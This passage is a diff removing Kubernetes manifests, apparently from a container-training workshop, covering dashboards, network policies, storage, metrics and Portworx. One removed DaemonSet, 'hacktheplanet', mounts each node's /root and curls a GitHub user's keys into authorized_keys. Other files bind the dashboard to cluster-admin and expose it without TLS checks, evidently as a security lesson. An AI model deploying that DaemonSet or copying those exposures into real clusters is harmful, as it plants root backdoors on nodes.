- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
---

View File

@@ -1,14 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
hostPath:
path: /root
tolerations:
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "apk update && apk add curl && curl https://github.com/bridgetkromhout.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,18 +0,0 @@
global
daemon
maxconn 256
defaults
mode tcp
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
frontend the-frontend
bind *:80
default_backend the-backend
backend the-backend
server google.com-80 google.com:80 maxconn 32 check
server ibm.fr-80 ibm.fr:80 maxconn 32 check

View File

@@ -1,16 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: haproxy
spec:
volumes:
- name: config
configMap:
name: haproxy
containers:
- name: haproxy
image: haproxy
volumeMounts:
- name: config
mountPath: /usr/local/etc/haproxy/
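This pod mounts a ConfigMap named `haproxy` into HAProxy's configuration directory. Assuming the HAProxy configuration shown just above is saved locally as `haproxy.cfg` (that filename is not visible in this diff, so it is an assumption), the ConfigMap could be created with:

```bash
# create the ConfigMap that the haproxy pod expects to mount
kubectl create configmap haproxy --from-file=haproxy.cfg
```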

View File

@@ -1,14 +0,0 @@
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: cheddar
spec:
rules:
- host: cheddar.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: cheddar
servicePort: 80

View File

@@ -1,220 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1beta2
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
labels:
app: dashboard
name: dashboard
spec:
selector:
matchLabels:
app: dashboard
template:
metadata:
labels:
app: dashboard
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
image: alpine
name: dashboard
---
apiVersion: v1
kind: Service
metadata:
labels:
app: dashboard
name: dashboard
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: dashboard
type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system

View File

@@ -1,10 +0,0 @@
apiVersion: v1
Kind: Pod
metadata:
name: hello
namespace: default
spec:
containers:
- name: hello
image: nginx

View File

@@ -1,29 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: kaniko-build
spec:
initContainers:
- name: git-clone
image: alpine
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
git clone git://github.com/jpetazzo/container.training /workspace
volumeMounts:
- name: workspace
mountPath: /workspace
containers:
- name: build-image
image: gcr.io/kaniko-project/executor:latest
args:
- "--context=/workspace/dockercoins/rng"
- "--insecure"
- "--destination=registry:5000/rng-kaniko:latest"
volumeMounts:
- name: workspace
mountPath: /workspace
volumes:
- name: workspace

View File

@@ -1,167 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1beta2
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard

View File

@@ -1,110 +0,0 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: local-path-provisioner-role
namespace: local-path-storage
rules:
- apiGroups: [""]
resources: ["nodes", "persistentvolumeclaims"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["endpoints", "persistentvolumes", "pods"]
verbs: ["*"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: local-path-provisioner-bind
namespace: local-path-storage
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
name: local-path-provisioner
namespace: local-path-storage
spec:
replicas: 1
selector:
matchLabels:
app: local-path-provisioner
template:
metadata:
labels:
app: local-path-provisioner
spec:
serviceAccountName: local-path-provisioner-service-account
containers:
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.8
imagePullPolicy: Always
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
volumes:
- name: config-volume
configMap:
name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
name: local-path-config
namespace: local-path-storage
data:
config.json: |-
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}

View File

@@ -1,138 +0,0 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: system:aggregated-metrics-reader
labels:
rbac.authorization.k8s.io/aggregate-to-view: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
name: v1beta1.metrics.k8s.io
spec:
service:
name: metrics-server
namespace: kube-system
group: metrics.k8s.io
version: v1beta1
insecureSkipTLSVerify: true
groupPriorityMinimum: 100
versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: metrics-server
namespace: kube-system
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
spec:
selector:
matchLabels:
k8s-app: metrics-server
template:
metadata:
name: metrics-server
labels:
k8s-app: metrics-server
spec:
serviceAccountName: metrics-server
volumes:
# mount in tmp so we can safely use from-scratch images and/or read-only containers
- name: tmp-dir
emptyDir: {}
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.1
imagePullPolicy: Always
volumeMounts:
- name: tmp-dir
mountPath: /tmp
args:
- --kubelet-preferred-address-types=InternalIP
- --kubelet-insecure-tls
- --metric-resolution=5s
---
apiVersion: v1
kind: Service
metadata:
name: metrics-server
namespace: kube-system
labels:
kubernetes.io/name: "Metrics-server"
spec:
selector:
k8s-app: metrics-server
ports:
- port: 443
protocol: TCP
targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system

View File

@@ -1,14 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-testcurl-for-testweb
spec:
podSelector:
matchLabels:
app: testweb
ingress:
- from:
- podSelector:
matchLabels:
run: testcurl
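One way to exercise this policy is to start a throwaway pod whose `run` label matches the selector (`kubectl run` labels the pod `run=testcurl` automatically); `testweb` is assumed here to be reachable as a Service name:

```bash
# should succeed, since pods labeled run=testcurl are allowed in
kubectl run testcurl --rm -ti --image=alpine --restart=Never -- wget -qO- -T 2 http://testweb
```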

View File

@@ -1,10 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-all-for-testweb
spec:
podSelector:
matchLabels:
app: testweb
ingress: []

View File

@@ -1,22 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector:
matchLabels:
ingress:
- from:
- podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-webui
spec:
podSelector:
matchLabels:
app: webui
ingress:
- from: []

View File

@@ -1,21 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-volume
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
- name: git
image: alpine
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/
restartPolicy: OnFailure

View File

@@ -1,95 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [ "" ]
resources: [ pods ]
verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
volumeMounts:
- name: data
mountPath: /consul/data
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,580 +0,0 @@
# SOURCE: https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true
apiVersion: v1
kind: ConfigMap
metadata:
name: stork-config
namespace: kube-system
data:
policy.cfg: |-
{
"kind": "Policy",
"apiVersion": "v1",
"extenders": [
{
"urlPrefix": "http://stork-service.kube-system.svc:8099",
"apiVersion": "v1beta1",
"filterVerb": "filter",
"prioritizeVerb": "prioritize",
"weight": 5,
"enableHttps": false,
"nodeCacheCapable": false
}
]
}
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: stork-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list", "delete"]
- apiGroups: [""]
resources: ["persistentvolumes"]
verbs: ["get", "list", "watch", "create", "delete"]
- apiGroups: [""]
resources: ["persistentvolumeclaims"]
verbs: ["get", "list", "watch", "update"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["events"]
verbs: ["list", "watch", "create", "update", "patch"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "list", "watch", "delete"]
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
resources: ["volumesnapshots"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
resources: ["volumesnapshotdatas"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "create", "update"]
- apiGroups: [""]
resources: ["services"]
verbs: ["get"]
- apiGroups: [""]
resources: ["nodes"]
verbs: ["get", "list", "watch"]
- apiGroups: ["*"]
resources: ["deployments", "deployments/extensions"]
verbs: ["list", "get", "watch", "patch", "update", "initialize"]
- apiGroups: ["*"]
resources: ["statefulsets", "statefulsets/extensions"]
verbs: ["list", "get", "watch", "patch", "update", "initialize"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-role-binding
subjects:
- kind: ServiceAccount
name: stork-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: stork-role
apiGroup: rbac.authorization.k8s.io
---
kind: Service
apiVersion: v1
metadata:
name: stork-service
namespace: kube-system
spec:
selector:
name: stork
ports:
- protocol: TCP
port: 8099
targetPort: 8099
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ""
labels:
tier: control-plane
name: stork
namespace: kube-system
spec:
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
replicas: 3
template:
metadata:
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ""
labels:
name: stork
tier: control-plane
spec:
containers:
- command:
- /stork
- --driver=pxd
- --verbose
- --leader-elect=true
- --health-monitor-interval=120
imagePullPolicy: Always
image: openstorage/stork:1.1.3
resources:
requests:
cpu: '0.1'
name: stork
hostPID: false
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: "name"
operator: In
values:
- stork
topologyKey: "kubernetes.io/hostname"
serviceAccountName: stork-account
---
kind: StorageClass
apiVersion: storage.k8s.io/v1
metadata:
name: stork-snapshot-sc
provisioner: stork-snapshot
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: stork-scheduler-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-scheduler-role
rules:
- apiGroups: [""]
resources: ["endpoints"]
verbs: ["get", "update"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch", "update"]
- apiGroups: [""]
resources: ["endpoints"]
verbs: ["create"]
- apiGroups: [""]
resourceNames: ["kube-scheduler"]
resources: ["endpoints"]
verbs: ["delete", "get", "patch", "update"]
- apiGroups: [""]
resources: ["nodes"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["delete", "get", "list", "watch"]
- apiGroups: [""]
resources: ["bindings", "pods/binding"]
verbs: ["create"]
- apiGroups: [""]
resources: ["pods/status"]
verbs: ["patch", "update"]
- apiGroups: [""]
resources: ["replicationcontrollers", "services"]
verbs: ["get", "list", "watch"]
- apiGroups: ["app", "extensions"]
resources: ["replicasets"]
verbs: ["get", "list", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets"]
verbs: ["get", "list", "watch"]
- apiGroups: ["policy"]
resources: ["poddisruptionbudgets"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["persistentvolumeclaims", "persistentvolumes"]
verbs: ["get", "list", "watch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-scheduler-role-binding
subjects:
- kind: ServiceAccount
name: stork-scheduler-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: stork-scheduler-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: apps/v1beta1
kind: Deployment
metadata:
labels:
component: scheduler
tier: control-plane
name: stork-scheduler
name: stork-scheduler
namespace: kube-system
spec:
replicas: 3
template:
metadata:
labels:
component: scheduler
tier: control-plane
name: stork-scheduler
spec:
containers:
- command:
- /usr/local/bin/kube-scheduler
- --address=0.0.0.0
- --leader-elect=true
- --scheduler-name=stork
- --policy-configmap=stork-config
- --policy-configmap-namespace=kube-system
- --lock-object-name=stork-scheduler
image: gcr.io/google_containers/kube-scheduler-amd64:v1.11.2
livenessProbe:
httpGet:
path: /healthz
port: 10251
initialDelaySeconds: 15
name: stork-scheduler
readinessProbe:
httpGet:
path: /healthz
port: 10251
resources:
requests:
cpu: '0.1'
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: "name"
operator: In
values:
- stork-scheduler
topologyKey: "kubernetes.io/hostname"
hostPID: false
serviceAccountName: stork-scheduler-account
---
kind: Service
apiVersion: v1
metadata:
name: portworx-service
namespace: kube-system
labels:
name: portworx
spec:
selector:
name: portworx
ports:
- name: px-api
protocol: TCP
port: 9001
targetPort: 9001
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: px-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: node-get-put-list-role
rules:
- apiGroups: [""]
resources: ["nodes"]
verbs: ["watch", "get", "update", "list"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["delete", "get", "list"]
- apiGroups: [""]
resources: ["persistentvolumeclaims", "persistentvolumes"]
verbs: ["get", "list"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "list", "update", "create"]
- apiGroups: ["extensions"]
resources: ["podsecuritypolicies"]
resourceNames: ["privileged"]
verbs: ["use"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: node-role-binding
subjects:
- kind: ServiceAccount
name: px-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: node-get-put-list-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Namespace
metadata:
name: portworx
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-role
namespace: portworx
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list", "create", "update", "patch"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-role-binding
namespace: portworx
subjects:
- kind: ServiceAccount
name: px-account
namespace: kube-system
roleRef:
kind: Role
name: px-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: portworx
namespace: kube-system
annotations:
portworx.com/install-source: "https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true"
spec:
minReadySeconds: 0
updateStrategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 1
template:
metadata:
labels:
name: portworx
spec:
affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: px/enabled
operator: NotIn
values:
- "false"
- key: node-role.kubernetes.io/master
operator: DoesNotExist
hostNetwork: true
hostPID: false
containers:
- name: portworx
image: portworx/oci-monitor:1.4.2.2
imagePullPolicy: Always
args:
["-c", "px-workshop", "-s", "/dev/loop4", "-b",
"-x", "kubernetes"]
env:
- name: "PX_TEMPLATE_VERSION"
value: "v4"
livenessProbe:
periodSeconds: 30
initialDelaySeconds: 840 # allow image pull in slow networks
httpGet:
host: 127.0.0.1
path: /status
port: 9001
readinessProbe:
periodSeconds: 10
httpGet:
host: 127.0.0.1
path: /health
port: 9015
terminationMessagePath: "/tmp/px-termination-log"
securityContext:
privileged: true
volumeMounts:
- name: dockersock
mountPath: /var/run/docker.sock
- name: etcpwx
mountPath: /etc/pwx
- name: optpwx
mountPath: /opt/pwx
- name: proc1nsmount
mountPath: /host_proc/1/ns
- name: sysdmount
mountPath: /etc/systemd/system
- name: diagsdump
mountPath: /var/cores
- name: journalmount1
mountPath: /var/run/log
readOnly: true
- name: journalmount2
mountPath: /var/log
readOnly: true
- name: dbusmount
mountPath: /var/run/dbus
restartPolicy: Always
serviceAccountName: px-account
volumes:
- name: dockersock
hostPath:
path: /var/run/docker.sock
- name: etcpwx
hostPath:
path: /etc/pwx
- name: optpwx
hostPath:
path: /opt/pwx
- name: proc1nsmount
hostPath:
path: /proc/1/ns
- name: sysdmount
hostPath:
path: /etc/systemd/system
- name: diagsdump
hostPath:
path: /var/cores
- name: journalmount1
hostPath:
path: /var/run/log
- name: journalmount2
hostPath:
path: /var/log
- name: dbusmount
hostPath:
path: /var/run/dbus
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: px-lh-account
namespace: kube-system
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-lh-role
namespace: kube-system
rules:
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "create", "update"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-lh-role-binding
namespace: kube-system
subjects:
- kind: ServiceAccount
name: px-lh-account
namespace: kube-system
roleRef:
kind: Role
name: px-lh-role
